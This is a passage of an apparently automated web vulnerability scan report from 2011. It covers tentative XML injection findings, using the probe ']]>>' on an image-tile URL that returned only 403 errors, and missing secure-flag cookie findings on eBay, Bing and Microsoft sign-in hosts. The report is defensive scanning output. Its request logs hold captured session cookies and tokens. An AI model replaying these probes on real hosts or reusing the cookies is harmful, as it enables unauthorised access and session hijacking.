<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>F57D73D99E37C7ED</RequestId><HostId>rkpOJn4RJ2EQGgBETjja1eHf/397Rko11Jcm+zTdEzN2tvBXIk
...[SNIP]...

8.264. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues]]>>/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9B004E07FB310A91
x-amz-id-2: bkFe2uI1o4Pxsad2XuYpxboY5UskQJFlNE4q3BhxaWFvWEcWKql8zK9LPMflyC2x
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 514c81df6f28c1f877bf37f387df04fe4eaf1a6b51bf8630e9e44919ddfac3cc9dd274342ff0a5db
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9B004E07FB310A91</RequestId><HostId>bkFe2uI1o4Pxsad2XuYpxboY5UskQJFlNE4q3BhxaWFvWEcWKq
...[SNIP]...

8.265. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium]]>>/u2/v15/tiles/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A58037948FD9DD6D
x-amz-id-2: aftqLOE6VbZcL1RBJGebjA3lhAi4w6Hrh7DDDcXIPNVgBs7BE01Sy2nnbD6+zuxh
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: cc01ad580ee21148ad75ab6aa837a3fc35a4eba1b283d92a6102222d5d6b36072a43f3785a63dde9
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A58037948FD9DD6D</RequestId><HostId>aftqLOE6VbZcL1RBJGebjA3lhAi4w6Hrh7DDDcXIPNVgBs7BE0
...[SNIP]...

8.266. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2]]>>/v15/tiles/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0F5352B35D9031CA
x-amz-id-2: m/wWJ5K/V60GYqtrf7esvraOuc9Od26z6Ru34aB9fIWWVMhGWUudDwtaP4NbmkHB
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:59 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 95dea8e3f337c1d78e1bd0bc97c9d909be2ac33d1a6264a06e1403038125a8cac5f52df11a503cd4
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0F5352B35D9031CA</RequestId><HostId>m/wWJ5K/V60GYqtrf7esvraOuc9Od26z6Ru34aB9fIWWVMhGWU
...[SNIP]...

8.267. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15]]>>/tiles/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0F0F70B0B3D947FB
x-amz-id-2: nORg1/MB8xEFBHYWrFum7MtYa23Kp9LjA3SrW21ujl6Y0TluhtuO21qfQNaz4PIn
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:03 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2111c375839d38d964ce940e40dde2888b9b7a4ed2b78c6f4ad5266e018de263ec30eec0046f073d
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0F0F70B0B3D947FB</RequestId><HostId>nORg1/MB8xEFBHYWrFum7MtYa23Kp9LjA3SrW21ujl6Y0Tluht
...[SNIP]...

8.268. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles]]>>/z19x154382y197049.png?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 224F669F053A60DF
x-amz-id-2: guKmpan/15AQ97CmPWKnj7EIHCax7W/7jR7/hfs3k4p/4+Ge9ZxT25ZKayMq69Bk
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:08 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ce94c36f5e99fbf3a93c5894eaf794251a47e279f7b091b7d330436b0385399b9b58aac992bbfd91
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>224F669F053A60DF</RequestId><HostId>guKmpan/15AQ97CmPWKnj7EIHCax7W/7jR7/hfs3k4p/4+Ge9Z
...[SNIP]...

8.269. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 7]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://maps.f6img.com
Path:   /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png

Issue detail

The REST URL parameter 7 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 7. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png]]>>?1311100430734 HTTP/1.1
Host: maps.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: EA07B7DD344114BA
x-amz-id-2: Msf94quOGgLw0PtHd0YF6xjDm0ynBmXdMgZKWxaSgQt3rECTgeVjbWC+/N/XczH5
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:11 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 318863759bd8d9b4ac1dc355e4ad5c8ecac42d0e4a49645c79403ad3b56a34ea2ab948ae55708e51
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 7f9993cdd9fdba01b6309a5b62aed091.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>EA07B7DD344114BA</RequestId><HostId>Msf94quOGgLw0PtHd0YF6xjDm0ynBmXdMgZKWxaSgQt3rECTge
...[SNIP]...

9. SSL cookie without secure flag set  previous  next
There are 6 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


9.1. https://signin.ebay.com/ws/eBayISAPI.dll  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://signin.ebay.com
Path:   /ws/eBayISAPI.dll

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ws/eBayISAPI.dll?SignIn&ru=http%3A%2F%2Foffer.ebay.com%2Fws%2FeBayISAPI.dll%3FBinConfirm%26item%3D120749940240%26quantity%3D1%26fb%3D1%26frompage%3D4340%26rev%3D3%26BidBinInfo%3D%253CbidInfo%253E%253CID%253E120749940240%253C%252FID%253E%253CMB%253E%253C%252FMB%253E%253CQTY%253E1%253C%252FQTY%253E%253C%252FbidInfo%253E&pageType=2143&onepagereg=1&item=120749940240&ICurl=https%3A%2F%2Fsecurethumbs.ebay.com%2Fpict%2F1207499402408080.jpg&ICtitle=U2+360+Tour+2+Tickets+sec345+New+Jersey+Wed+July+2011&ICdateMedium=Aug-13-11&ICtimeLong=16%3A29%3A46+PDT&gch=1&gchru=https%3A%2F%2Fpayments.ebay.com%2Fws%2FeBayISAPI.dll%3FGuestCheckoutProcessor%26item%3D120749940240%26quantity%3D1%26transactionid%3D-1%26rev%3D3 HTTP/1.1
Host: signin.ebay.com
Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=120749940240+&clk_rvr_id=248601715093&item=120749940240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btpim/14e25d577^tguid/adb7b0cb1300a0aa15432be3fe5c7984500701ef^cguid/3666b2e01300a47a44d622a6ffc19372500701ef^trm/svid%3D94316858148500701ef^; ns1=BAQAAATErF7ITAAaAANgARlAHAfFjNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wh+8/E+zDKMcCgsoubg41npdHFIQ*; cssg=43ae68ff1310a02680b5d7a5ffb89bda; s=CgAD4ACBOJx/xNDNhZTY4ZmYxMzEwYTAyNjgwYjVkN2E1ZmZiODliZGEBSgAYTicf8TRlMjVjZTcxLjAuMS4xMS44MS4wLjAuMaysycM*; nonsession=CgAAIABxOTVtxMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi8/xYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXVeTEBTAAYUAcB8TRlMjVjZTcxLjAuMS4xMS43OC4zLjAuMUqr+U4*; lucky9=3520182; dp1=bvrvi/1%7C0%7C120749940240%7C4e32fd71^u1p/QEBfX0BAX19AQA**500701f1^tzo/12c51e8357a^pbf/#20000000000000000051e8357a^idm/14e272014^; ds2=sotr/b13qzzzzzLCz^ssts/1311100657078^; ebay=%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Esbf%3D%23a0000100000%5Ejs%3D1%5Elrtjs%3D0.8%5Ecos%3D9%5Epsi%3DArmkOaAs*%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ds2=asotr/b13qzzzzzLCz^; Domain=.ebay.com; Path=/
Set-Cookie: ebay=%5Elrtjs%3D0.8%5Esbf%3D%23a0000000000%5Ecos%3D9%5Ecv%3D15555%5Elvmn%3D0%7C0%7C%5Ejs%3D1%5Edv%3D4e25cf41%5E; Domain=.ebay.com; Path=/
Set-Cookie: dp1=bpbf/%23200010000000000004500702dd^vrvi/1%7C0%7C120749940240%7C4e32fe5d^tzo/12c4e25dd6d^u1p/QEBfX0BAX19AQA**500702dd^idm/14e272014^; Domain=.ebay.com; Expires=Thu, 18-Jul-2013 18:39:25 GMT; Path=/
Set-Cookie: ns1=BAQAAATErF7ITAAaAANgARlAHAt1jNjZ8NTE1XjEzMDg1ODQ1NjQwMjReMF5eMF4zYTAwMjAwODhiMDZeM14yMV41MF4yXjNeMV4yXjNeMV4yMV4xXjBeMF4wbJTEBBjv23JNCoxnvDIMVQczNds*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: cssg=43ae68ff1310a02680b5d7a5ffb89bda; Domain=.ebay.com; Path=/
Set-Cookie: s=BAQAAATErF7ITAAWAAPgAIE4nIN00M2FlNjhmZjEzMTBhMDI2ODBiNWQ3YTVmZmI4OWJkYQFKABhOJyDdNGUyNWNmNWQuMC4xLjExLjgxLjAuMC4zABIACk4nIN10ZXN0Q29va2llmcFrAvoor5z2I5918AzcfwHQvMw*; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgAAIABxOTVxdMTMxMTEwMDUyOXgxMjA3NDk5NDAyNDB4MHgyTgDKACBXi9DdYWRiN2IwY2IxMzAwYTBhYTE1NDMyYmUzZmU1Yzc5ODQAywABTiXWZTMBTAAYUAcC3TRlMjVjZjVkLjAuMS4xMS43OC4zLjAuM3OY3B0*; Domain=.ebay.com; Expires=Wed, 18-Jul-2012 18:39:25 GMT; Path=/
Set-Cookie: lucky9=3520182; Domain=.ebay.com; Expires=Sun, 17-Jul-2016 18:39:25 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 20544
Date: Tue, 19 Jul 2011 18:39:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script></script><d
...[SNIP]...

9.2. https://support.discoverbing.com/LTS/default.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://support.discoverbing.com
Path:   /LTS/default.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /LTS/default.aspx?SSID=15&MSID=b3669c96-3886-4430-9363-3e7a37fa4b8a&SiteLCID=1033&RefURL=http%3a%2f%2fonlinehelp.microsoft.com%2fen-us%2fbing%2fff808415.aspx&ContentType=DM&EventCollectionID=1&FlexId=12&FlexValue4=mozilla%2f5.0%20(windows%20nt%206.1%3b%20wow64)%20applewebkit%2f534.30%20(khtml%2c%20like%20gecko)%20chrome%2f12.0.742.122%20safari%2f534.30&FlexValue1=bing&FlexValue2=global_support_oasp&FlexValue3=&FlexValue5=&PassportStatus=0&URL=https%3a%2f%2fsupport.discoverbing.com%2fDefault.aspx%3f%26st%3d1%26wfxredirect%3d1&ContentId=global_support_oasp HTTP/1.1
Host: support.discoverbing.com
Connection: keep-alive
Referer: https://support.discoverbing.com/Default.aspx?&st=1&wfxredirect=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; scrx=1; MSIDCookie=b3669c96-3886-4430-9363-3e7a37fa4b8a; AuthKey=oss_bing; WFXLANG=en-us

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Tue, 19 Jul 2011 15:18:15 GMT
Pragma: no-cache
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: GsfxSessionCookie=44234530295139662; domain=.microsoft.com; path=/
Set-Cookie: MC1=GUID=2ba8c043c3ce4713ae02820ed49cd1d7&HASH=2ba8&LV=20117&V=3; domain=.microsoft.com; expires=Mon, 19-Jul-2021 15:18:15 GMT; path=/
Set-Cookie: GsfxStatsLog=true; domain=.microsoft.com; path=/
Vary: Accept-Encoding
Content-Length: 43

GIF89a.............!.......,...........D..;

9.3. https://login.live.com/login.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1311089470&rver=6.1.6206.0&wp=LBI&wreply=https:%2F%2Fanswers.microsoft.com%2Fen-us%2FSite%2FCompleteSignIn%3Fprovider%3Dwlid&id=273572 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: http://answers.microsoft.com/en-us/zune/forum/zune_install-player/mp3-conversion/efa762b3-d6d3-478f-9a59-1cd7414b0374
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; wlidperf=throughput=2&latency=1306; MSPRequ=lt=1311089374&co=1&id=273572; MSPOK=$uuid-240ff659-d409-4377-897e-e75ad2d199e3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14574
Content-Type: text/html; charset=utf-8
Expires: Tue, 19 Jul 2011 15:37:02 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1311089882&co=1&id=273572; path=/;version=1
Set-Cookie: MSPOK=$uuid-240ff659-d409-4377-897e-e75ad2d199e3$uuid-1895cee1-27dd-48d7-8aac-abac4dc44583$uuid-893a9771-4ec1-49d2-b1d0-11979f88bfa5; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1H49 V: 0
Date: Tue, 19 Jul 2011 15:38:01 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1H49 2011.07.09.12.24.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDB073, -- Version: 11,0,18312,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

9.4. https://ssl.bing.com/travel/secure/account/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl.bing.com
Path:   /travel/secure/account/overview

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /travel/secure/account/overview?FORM=TRGRMR HTTP/1.1
Host: ssl.bing.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lbc=318; JSESSIONID=E9781CDFFAE578D97F1CEE56FE6B125F; ETID=BCID-z62stftdmjtffpyz5v577d2o9v13o_VID-2a4fcb0ot2i3byz5nk9raqul1bf3_UID-; s_cc=true; s_sq=%5B%5BB%5D%5D; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; SRCHUID=V=2&GUID=7F073A8D66F24C72BB90F3E48AA61B8A; _msaId=d8678782_61_15534038; _FP=; MUID=E361C23374E642C998D8ABA7166A75EC; SRCHD=MS=1865664&SM=1&D=1769857&AF=BMMENO; _SS=SID=2FF6BBE251234F40B4038D899CDFDA5D&hIm=796; RMS=F=OC; _HOP=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, no-store, max-age=0
Content-Length: 0
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311118711&rver=6.1.6195.0&wp=LBI&wreply=https:%2F%2Fssl.bing.com%2Fsecure%2Fpassport.aspx%3Frequrl%3Dhttp%253A%252F%252Fssl.bing.com%252Ftravel%252Fsecure%252Faccount%252Foverview%253FFORM%253DTRGRMR%2526wlidtobt&lc=1033&id=264960
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Tue, 19 Jul 2011 23:38:32 GMT
Connection: keep-alive
Set-Cookie: _HOP=I=2&TS=1311118711; domain=.bing.com; path=/


9.5. https://support.discoverbing.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.discoverbing.com
Path:   /Default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.aspx?&st=1&wfxredirect=1 HTTP/1.1
Host: support.discoverbing.com
Connection: keep-alive
Referer: http://onlinehelp.microsoft.com/en-us/bing/ff808415.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 19 Jul 2011 15:18:11 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: scrx=1; expires=Thu, 19-Jul-2012 15:18:11 GMT; path=/
Set-Cookie: MSIDCookie=b3669c96-3886-4430-9363-3e7a37fa4b8a; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Vary: Accept-Encoding
Content-Length: 23919

